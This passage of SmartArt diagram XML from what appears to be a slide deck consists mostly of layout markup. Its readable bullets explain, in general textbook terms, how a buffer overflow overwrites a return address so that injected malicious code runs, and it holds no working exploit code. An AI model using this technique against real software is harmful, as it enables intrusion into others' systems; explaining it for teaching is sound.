      <dgm:prSet presAssocID="{5C7152C7-70CE-4590-9581-CAD7C040C625}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3A54C10F-B02E-44B7-88C9-CD7310413B6C}" type="pres">
      <dgm:prSet presAssocID="{8EBA70B1-F6AF-4E08-94F6-CDD6D45A9669}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC674932-F46F-4D16-93DC-D7029D44BF68}" type="pres">
      <dgm:prSet presAssocID="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8626CD8-70B2-431D-A6E0-E3CB86D15B5F}" type="pres">
      <dgm:prSet presAssocID="{14930EB4-ACB2-4E3A-AEE5-EB313022C092}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}" type="pres">
      <dgm:prSet presAssocID="{2970D06E-C997-4BA8-8DF5-5110013226ED}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7D0FD6E-B57A-454A-A439-6EB6EEB649E5}" type="pres">
      <dgm:prSet presAssocID="{66DB45F4-659C-4131-B8FA-FCB3C749616F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}" type="pres">
      <dgm:prSet presAssocID="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C0F997D-1F1C-4204-9C67-6F58E5191839}" type="pres">
      <dgm:prSet presAssocID="{AC1F8055-0306-4FCD-A3E2-3AE2905B74DA}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}" type="pres">
      <dgm:prSet presAssocID="{BD41F568-B9F1-4DC4-B361-F553D5D72888}" presName="parentText" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E261A84A-A46B-4334-91B1-2DDF1D2ECC98}" type="pres">
      <dgm:prSet presAssocID="{D1196959-A24D-43E0-9C76-4A69D45563D5}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}" type="pres">
      <dgm:prSet presAssocID="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}" presName="parentText" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A526008-01D5-4013-9242-90D55846E70F}" type="pres">
      <dgm:prSet presAssocID="{A0D9F33D-4D84-4577-8DDD-BE310AF948EE}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}" type="pres">
      <dgm:prSet presAssocID="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}" presName="parentText" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7E272900-85E8-4D20-88E3-741D04AC35FA}" type="presOf" srcId="{BD41F568-B9F1-4DC4-B361-F553D5D72888}" destId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FCB5DF0D-D126-4DC0-B673-7BC8195ED6AA}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{2970D06E-C997-4BA8-8DF5-5110013226ED}" srcOrd="4" destOrd="0" parTransId="{E83A23C0-42E3-41C1-BDD8-0C9A073E86BD}" sibTransId="{66DB45F4-659C-4131-B8FA-FCB3C749616F}"/>
    <dgm:cxn modelId="{AAA33C16-07FD-4CE5-9303-0B9022C37CA6}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}" srcOrd="5" destOrd="0" parTransId="{26F69B7D-9226-4D56-8BEB-4EBD7EA4F6CC}" sibTransId="{AC1F8055-0306-4FCD-A3E2-3AE2905B74DA}"/>
    <dgm:cxn modelId="{9062C91D-9AAF-42CC-AEE2-BB04F84406C1}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{B3802C71-E230-405F-B4C0-E81AB3CF5DD8}" srcOrd="0" destOrd="0" parTransId="{C70C1B72-3E93-4834-B3B0-8C5903EECE07}" sibTransId="{F3AD596C-65CE-40E6-B95C-B05871B740AA}"/>
    <dgm:cxn modelId="{D48B4138-EC5E-41E1-8C51-18A0BC8785B3}" type="presOf" srcId="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}" destId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9ED7EC5F-2DAD-4FAB-80C4-525D7BB44014}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}" srcOrd="3" destOrd="0" parTransId="{344A0C3E-BA1B-461E-B7F2-1F6079AFFA65}" sibTransId="{14930EB4-ACB2-4E3A-AEE5-EB313022C092}"/>
    <dgm:cxn modelId="{C7EC7163-2DA7-4612-A0FF-FC6A027DB66E}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}" srcOrd="1" destOrd="0" parTransId="{78999592-A927-4B29-AA41-EEB0CBD89704}" sibTransId="{6005CB17-1283-4C25-B39A-25A09B46E397}"/>
    <dgm:cxn modelId="{D02E1E6E-E549-4DB9-81D4-CC8FBAAEA8C2}" type="presOf" srcId="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}" destId="{EC674932-F46F-4D16-93DC-D7029D44BF68}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{448E8E72-B623-4380-BCA0-026EF6C68A5D}" type="presOf" srcId="{B3802C71-E230-405F-B4C0-E81AB3CF5DD8}" destId="{AE591548-E246-458E-97D2-E81065480C3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E0371573-4C90-46EB-85E8-8F5B23B95024}" type="presOf" srcId="{5C7152C7-70CE-4590-9581-CAD7C040C625}" destId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{90AF2E76-A9BC-40D8-A934-FC517EF4FE40}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}" srcOrd="7" destOrd="0" parTransId="{AD5B0145-89CC-4971-9FED-BF344596FD67}" sibTransId="{A0D9F33D-4D84-4577-8DDD-BE310AF948EE}"/>
    <dgm:cxn modelId="{D1C98779-F4BB-44D7-87CF-72005316C176}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}" srcOrd="8" destOrd="0" parTransId="{46E11D4C-907C-4A9A-9CA7-7BC903F65967}" sibTransId="{3CF4F287-1D54-4E82-80EE-040326C49DCB}"/>
    <dgm:cxn modelId="{45105889-89EA-462D-AD41-50D3C8B7957B}" type="presOf" srcId="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}" destId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FC6C799D-1C86-463A-8A2F-83F291B8BB19}" type="presOf" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A74B7BAE-F460-4D09-9D77-EEFA4CAC2E1A}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{BD41F568-B9F1-4DC4-B361-F553D5D72888}" srcOrd="6" destOrd="0" parTransId="{0640B4A8-37FB-4C56-9F63-92E2EBD40589}" sibTransId="{D1196959-A24D-43E0-9C76-4A69D45563D5}"/>
    <dgm:cxn modelId="{87417BB4-463A-4A53-8520-2A36DD68A20E}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{5C7152C7-70CE-4590-9581-CAD7C040C625}" srcOrd="2" destOrd="0" parTransId="{7C06557E-9994-4557-A400-DE87286DE6DD}" sibTransId="{8EBA70B1-F6AF-4E08-94F6-CDD6D45A9669}"/>
    <dgm:cxn modelId="{56D013CE-3B0E-4380-A2F5-F08036398D00}" type="presOf" srcId="{2970D06E-C997-4BA8-8DF5-5110013226ED}" destId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F8A917D2-EF56-4E5A-AECF-758ECA877F80}" type="presOf" srcId="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}" destId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{066C7FD5-2521-4851-A2ED-4EAD48BE3744}" type="presOf" srcId="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}" destId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{84F7AF34-711A-4C69-9755-B05805214A01}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{AE591548-E246-458E-97D2-E81065480C3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{91A0E578-219F-4073-AFEF-081F8D703806}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{6EE90F11-71A2-4A5E-8C8D-0248B580212A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{553B58E2-F91D-4708-A583-E15FD3FB5E24}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BE5BAB00-ACF5-40F5-A9DD-21C9BCFB1557}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{BF89C33F-5E60-42A1-AB50-F7FB1CBD10CF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D238FB49-4106-4985-A7EB-F65BD64F4F59}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7E06C0DD-684D-4C63-9D65-65ED00DF7409}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{3A54C10F-B02E-44B7-88C9-CD7310413B6C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F3B53BCB-5121-471F-A1FD-256FA8B88767}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{EC674932-F46F-4D16-93DC-D7029D44BF68}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4E79D0A8-FFD9-4624-AE47-C4AF8EE1F31F}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{E8626CD8-70B2-431D-A6E0-E3CB86D15B5F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C64D7027-EC4D-4DEE-8D61-2B06EBAF9B11}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{12B30620-5BE8-44AC-A70C-86833235243B}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{C7D0FD6E-B57A-454A-A439-6EB6EEB649E5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C0B2C0EF-8801-42A4-8AE4-DB86C8F2A449}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EC01BD2E-3C2A-4FD2-A432-37E62A1780CD}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{1C0F997D-1F1C-4204-9C67-6F58E5191839}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B7D4D364-BC1B-412C-B48E-1FB0C7F64ADE}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2A5B6695-C748-44F3-AD04-4350B1B790CE}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{E261A84A-A46B-4334-91B1-2DDF1D2ECC98}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{741A3788-7453-415C-8C82-878CC509CAB8}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{53C1D4A2-AF2F-4750-BB1F-35A8FD41A489}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{2A526008-01D5-4013-9242-90D55846E70F}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FB1C73DE-D607-447F-9CE8-99EC345FCAAC}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}"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4A8A97-2947-4889-99F3-AB46E9BB142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871700D0-AAA4-4EAA-9361-601A2099FE85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Special attack that exploits the lack of input length validation to a buffer.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05BE0EFD-BBA8-4048-A4B6-37AC89322038}" type="parTrans" cxnId="{09010A2D-9D01-4D55-B52F-46598F9BA9A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55FD3897-4E2D-4EF3-AE70-06234756C71E}" type="sibTrans" cxnId="{09010A2D-9D01-4D55-B52F-46598F9BA9A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>After that it overwrite the adjacent memory next to the buffer.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8451188-E6BC-481B-B66E-183D21559E9E}" type="parTrans" cxnId="{47464EE8-27E5-4F0E-9EA9-B63F8AD56B8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D388AD04-7A97-463A-A4A4-C641F6C34237}" type="sibTrans" cxnId="{47464EE8-27E5-4F0E-9EA9-B63F8AD56B8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>I can exploit this behavior by overwriting the return address and make it point to my exploit in the machine.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B710B920-CCCB-4A38-BBE5-8F07B1C8FEAA}" type="parTrans" cxnId="{4859E305-5097-413C-B4F5-397216D23CCE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07F2D981-BBEA-4982-835E-96A9F98BA54D}" type="sibTrans" cxnId="{4859E305-5097-413C-B4F5-397216D23CCE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E07FA459-BF60-45C1-937E-618087AB338A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Once the return address is overwritten and the function running is finished the machine will jump to the malicious code and execute it.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33E33C96-1BEA-4D2C-9272-BA50AD801E72}" type="parTrans" cxnId="{3A4640AD-936A-4EE0-AE8E-EF58176E86DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FCFB912-2B2C-48C3-B4F7-027555F2EB18}" type="sibTrans" cxnId="{3A4640AD-936A-4EE0-AE8E-EF58176E86DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" type="pres">
      <dgm:prSet presAssocID="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3E57C07-7A1F-44F1-809E-64C8EAC4CE73}" type="pres">
      <dgm:prSet presAssocID="{871700D0-AAA4-4EAA-9361-601A2099FE85}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CFCDEAA9-9C09-4AB8-9354-4141B1E6C09D}" type="pres">
      <dgm:prSet presAssocID="{55FD3897-4E2D-4EF3-AE70-06234756C71E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}" type="pres">
      <dgm:prSet presAssocID="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29F04727-FEC2-4264-9E0C-CC630F4739A8}" type="pres">
      <dgm:prSet presAssocID="{D388AD04-7A97-463A-A4A4-C641F6C34237}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}" type="pres">
      <dgm:prSet presAssocID="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B211F55F-0C42-4F6F-AF65-8144B7BFF4CA}" type="pres">
      <dgm:prSet presAssocID="{07F2D981-BBEA-4982-835E-96A9F98BA54D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD87}" type="pres">
      <dgm:prSet presAssocID="{E07FA459-BF60-45C1-937E-618087AB338A}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{4859E305-5097-413C-B4F5-397216D23CCE}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}" srcOrd="2" destOrd="0" parTransId="{B710B920-CCCB-4A38-BBE5-8F07B1C8FEAA}" sibTransId="{07F2D981-BBEA-4982-835E-96A9F98BA54D}"/>
    <dgm:cxn modelId="{09010A2D-9D01-4D55-B52F-46598F9BA9A1}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{871700D0-AAA4-4EAA-9361-601A2099FE85}" srcOrd="0" destOrd="0" parTransId="{05BE0EFD-BBA8-4048-A4B6-37AC89322038}" sibTransId="{55FD3897-4E2D-4EF3-AE70-06234756C71E}"/>
    <dgm:cxn modelId="{0ABC2D32-63DD-4D86-A709-97BD6B7C7B66}" type="presOf" srcId="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}" destId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EF743588-8AEA-4171-B568-09B6BDAF84F9}" type="presOf" srcId="{E07FA459-BF60-45C1-937E-618087AB338A}" destId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{88964C97-0DA4-4400-9B5D-C7DD28855A3D}" type="presOf" srcId="{871700D0-AAA4-4EAA-9361-601A2099FE85}" destId="{D3E57C07-7A1F-44F1-809E-64C8EAC4CE73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{92FC6D98-8CE3-4DDA-8BD4-EEDF6622DC65}" type="presOf" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3A4640AD-936A-4EE0-AE8E-EF58176E86DC}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{E07FA459-BF60-45C1-937E-618087AB338A}" srcOrd="3" destOrd="0" parTransId="{33E33C96-1BEA-4D2C-9272-BA50AD801E72}" sibTransId="{0FCFB912-2B2C-48C3-B4F7-027555F2EB18}"/>
    <dgm:cxn modelId="{80A3C0BE-DCA0-4D95-BC90-292C56E4D6F6}" type="presOf" srcId="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}" destId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47464EE8-27E5-4F0E-9EA9-B63F8AD56B8B}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}" srcOrd="1" destOrd="0" parTransId="{C8451188-E6BC-481B-B66E-183D21559E9E}" sibTransId="{D388AD04-7A97-463A-A4A4-C641F6C34237}"/>
    <dgm:cxn modelId="{3B7A5DF7-69CE-4DAD-AAA1-03B4C4065D06}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{D3E57C07-7A1F-44F1-809E-64C8EAC4CE73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{99FAF2EB-C9FB-4BE4-A4B7-41CD7B8CF583}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{CFCDEAA9-9C09-4AB8-9354-4141B1E6C09D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DE70217B-8FBA-4BDE-AF8D-4030BA3AB271}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E00F15A7-FF9E-49E9-A416-AFAC80CCAF07}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{29F04727-FEC2-4264-9E0C-CC630F4739A8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
